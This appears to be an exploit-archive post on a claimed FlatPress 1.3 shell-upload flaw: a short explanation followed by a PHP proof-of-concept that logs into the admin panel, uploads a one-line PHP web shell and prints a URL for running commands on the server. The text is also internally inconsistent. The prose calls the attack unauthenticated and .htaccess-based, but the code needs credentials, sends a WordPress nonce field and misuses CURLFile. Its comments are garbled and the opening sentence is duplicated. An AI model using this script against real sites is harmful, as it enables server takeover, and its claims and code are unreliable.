FlatPress 1.3 Shell Upload

The FlatPress 1.3 Shell Upload refers to a critical vulnerability The FlatPress 1.3 Shell Upload refers to a critical vulnerability in the FlatPress blogging engine, version 1.3.

This flaw allowed unauthenticated attackers to achieve Remote Code Execution (RCE). The exploit leveraged a weakness in file upload handling.

Attackers could bypass file type restrictions by first uploading a malicious `.htaccess` file. This `.htaccess` file would configure the web server to interpret a seemingly innocuous file extension (e.g., `.jpg` or `.txt`) as a PHP script.

Subsequently, the attacker would upload a PHP web shell using the "allowed" extension. When accessed, this file would execute, granting the attacker full control over the compromised server.

This allowed for data manipulation, defacement, or further system compromise. The vulnerability was patched in FlatPress 1.4, making updates essential for security.

=============================================================================================================================================
| # Title : FlatPress 1.3 shell upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://github.com/flatpressblog/flatpress/archive/1.3.zip |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.

(Related : https://packetstorm.news/files/id/178208/ Related CVE numbers: ) .

[+] save code as poc.php.

[+] Usage: script.php <base_url> <username> <password>

[+] PayLoad :

<?php
function random_string($length = 5) {
// ????? ????? ???????
$letters = 'abcdefghijklmnopqrstuvwxyz';
return substr(str_shuffle($letters), 0, $length);
}

function login_and_upload($base_url, $username, $password) {
$filename = random_string() . ".php";
$login_url = "http://{$base_url}/login.php";
$upload_url = "http://{$base_url}/admin.php?p=uploader&action=default";

// ????? ???? cURL ?????
$ch = curl_init();

// ????? ?????? cURL ??????
$login_data = [
'user' => $username,
'pass' => $password,
'submit' => 'Login'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));

// ????? ?????
$response = curl_exec($ch);

if (strpos($response, 'Logout') !== false) {
echo "Login Successful!\n";
} else {
echo "Login Failed!\n";
echo $response;
return;
}

// ????? ?????
echo "Shell uploading...\n";

// ????? ?????? ?????? ???? ?????
$files = [
'upload[]' => new CURLFile('php://memory', 'text/php', '<?php echo `$_GET[0]`; ?>')
];
$form_data = [
'_wpnonce' => '9e0ed04260',
'_wp_http_referer' => '/admin.php?p=uploader',
'upload' => 'Upload'
];

curl_setopt($ch, CURLOPT_URL, $upload_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($form_data, $files));

// ????? ??? ??? ?????
$response = curl_exec($ch);

if (strpos($response, 'File(s) uploaded') !== false || strpos($response, 'Upload') !== false) {
$shell_url = "http://{$base_url}/fp-content/attachs/{$filename}";
echo "Your Shell is Ready: {$shell_url}\n";
echo "Shell Usage: {$shell_url}?0=command\n";
} else {
echo "Exploit Failed!\n";
echo $response;
}

// ????? ???? cURL
curl_close($ch);
}

// ???? ???????
if ($argc != 4) {
echo "Usage: script.php <base_url> <username> <password>\n";
} else {
list($script, $base_url, $username, $password) = $argv;
login_and_upload($base_url, $username, $password);
}
?>





Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================